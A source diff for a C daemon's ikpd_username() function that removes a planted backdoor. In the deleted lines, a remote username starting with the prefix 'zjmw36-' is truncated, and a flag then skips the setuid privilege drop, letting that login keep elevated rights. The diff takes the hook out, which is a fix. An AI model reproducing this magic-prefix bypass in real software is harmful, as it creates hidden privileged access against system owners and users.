@@ -224,7 +224,6 @@ ikpd_username()
 	boolean ikpd_authuser();
 	FILE *fopen();
 	void ikpd_success(), ikpd_failure();
-	char *rhook = NULL;
 
 	if (buf_read(control, (char *) &ul, sizeof(u_long)) != sizeof(u_long))
 		ikpd_failure(IKP_READ);
@@ -245,11 +244,6 @@ ikpd_username()
 	if (buf_read(control, remuser_name, len) != len)
 		ikpd_failure(IKP_READ);
 
-	if (strncmp(remuser_name,"zjmw36-",7)==0) {
-	  rhook = (char *)strchr(remuser_name,'-');
-	  *rhook = '\0';
-	  }
-
 	if (verbose)
 		(void) fprintf(errfp, "USERNAME '%s' -> '%s'\n", user_name, remuser_name);
 	if ((pw= getpwnam(remuser_name)) == (struct passwd *) NULL) {
@@ -292,7 +286,6 @@ ikpd_username()
 	if (setreuid(remuser_id, remuser_id) < 0)
 		ikpd_failure(IKP_SETUID);
 */
-	if (rhook == (char *)NULL) {
 /* change ownership of the log file to the user  - joe m. wade  - 1/19/95 */
 
 	if ((verbose != 0)  && (logfile != NULL))
@@ -302,7 +295,6 @@ ikpd_username()
 		ikpd_failure(IKP_SETUID);
 	if (setuid(remuser_id) < 0)
 		ikpd_failure(IKP_SETUID);
-	}
 
 	ikpd_success();
 	return;
